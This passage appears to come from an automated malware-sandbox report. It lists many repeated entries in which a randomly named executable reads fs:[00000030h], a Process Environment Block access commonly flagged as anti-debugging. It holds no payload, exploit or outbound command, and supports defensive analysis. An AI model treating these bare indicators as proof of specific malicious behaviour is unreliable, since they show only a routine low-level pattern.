Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C3EA0 mov eax, dword ptr fs:[00000030h]16_2_1F3C3EA0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CC692 mov eax, dword ptr fs:[00000030h]16_2_1F3CC692
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F480EFB mov eax, dword ptr fs:[00000030h]16_2_1F480EFB
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3D6682 mov eax, dword ptr fs:[00000030h]16_2_1F3D6682
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C4EFE mov eax, dword ptr fs:[00000030h]16_2_1F3C4EFE
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C4EFE mov eax, dword ptr fs:[00000030h]16_2_1F3C4EFE
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F16E5 mov eax, dword ptr fs:[00000030h]16_2_1F3F16E5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F16E5 mov eax, dword ptr fs:[00000030h]16_2_1F3F16E5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F403E9A mov eax, dword ptr fs:[00000030h]16_2_1F403E9A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F403E9A mov eax, dword ptr fs:[00000030h]16_2_1F403E9A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F403E9A mov eax, dword ptr fs:[00000030h]16_2_1F403E9A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E96 mov eax, dword ptr fs:[00000030h]16_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4986A9 mov eax, dword ptr fs:[00000030h]16_2_1F4986A9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1530 mov eax, dword ptr fs:[00000030h]16_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FE52F mov ecx, dword ptr fs:[00000030h]16_2_1F3FE52F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FE52F mov eax, dword ptr fs:[00000030h]16_2_1F3FE52F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FE52F mov eax, dword ptr fs:[00000030h]16_2_1F3FE52F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C356C mov eax, dword ptr fs:[00000030h]16_2_1F3C356C
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C356C mov eax, dword ptr fs:[00000030h]16_2_1F3C356C
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F480D1B mov eax, dword ptr fs:[00000030h]16_2_1F480D1B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F056B mov eax, dword ptr fs:[00000030h]16_2_1F3F056B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F453D10 mov eax, dword ptr fs:[00000030h]16_2_1F453D10
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F49952E mov eax, dword ptr fs:[00000030h]16_2_1F49952E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C35B1 mov eax, dword ptr fs:[00000030h]16_2_1F3C35B1
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F444DCA mov eax, dword ptr fs:[00000030h]16_2_1F444DCA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F444DCA mov eax, dword ptr fs:[00000030h]16_2_1F444DCA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2DAA mov eax, dword ptr fs:[00000030h]16_2_1F3C2DAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2DAA mov eax, dword ptr fs:[00000030h]16_2_1F3C2DAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2DAA mov eax, dword ptr fs:[00000030h]16_2_1F3C2DAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2DAA mov eax, dword ptr fs:[00000030h]16_2_1F3C2DAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2DAA mov eax, dword ptr fs:[00000030h]16_2_1F3C2DAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4985EA mov eax, dword ptr fs:[00000030h]16_2_1F4985EA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F471DE3 mov ecx, dword ptr fs:[00000030h]16_2_1F471DE3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F471DE3 mov ecx, dword ptr fs:[00000030h]16_2_1F471DE3
Source: C:\Progr